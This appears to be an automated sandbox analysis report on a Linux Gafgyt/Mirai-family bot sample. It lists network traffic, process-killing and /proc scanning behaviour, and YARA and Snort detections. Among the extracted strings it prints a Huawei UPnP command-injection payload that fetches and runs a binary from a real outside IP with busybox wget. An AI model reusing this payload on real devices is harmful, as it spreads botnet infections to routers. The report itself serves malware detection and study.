            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443

            System Summary

            barindex
            Source: zogsXPGVgB.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: zogsXPGVgB.elf PID: 5441, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox wget
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busyboxxx
            Source: Initial sampleString containing 'busybox' found: busyboxx
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc/proc/%d/cmdlinenetstatcurlechocatbin/busyboxbusybox wget/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/tmp/boot/proc/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystemcundicundi.*var/Condibin/Condibin/babylonetop1hbttop1hbt./root/dvr_gui//root/dvr_app//anko-app/902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)SIGKILL sent: pid: 1881, result: successfulJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)SIGKILL sent: pid: 3246, result: successfulJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)SIGKILL sent: pid: 5454, result: successfulJump to behavior
            Source: zogsXPGVgB.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: zogsXPGVgB.elf PID: 5441, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal96.troj.linELF@0/1025@21/0
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/5386/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3639/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/238/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/239/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3753/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/914/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3095/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/241/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1906/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/802/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1482/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1480/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/371/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1238/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/134/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/3413/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/1475/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/936/cmdlineJump to behavior
            Source: /tmp/zogsXPGVgB.elf (PID: 5445)File opened: /proc/30/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
            Source: /tmp/zogsXPGVgB.elf (PID: 5441)Queries kernel information via 'uname': Jump to behavior
            Source: zogsXPGVgB.elf, 5441.1.00007fffdb1ef000.00007fffdb210000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/zogsXPGVgB.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/zogsXPGVgB.elf
            Source: zogsXPGVgB.elf, 5441.1.00005581df3c9000.00005581df479000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
            Source: zogsXPGVgB.elf, 5441.1.00005581df3c9000.00005581df479000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
            Source: zogsXPGVgB.elf, 5441.1.00007fffdb1ef000.00007fffdb210000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: zogsXPGVgB.elf, type: SAMPLE
            Source: Yara matchFile source: 5441.1.00007ff4e4001000.00007ff4e4021000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: zogsXPGVgB.elf PID: 5441, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
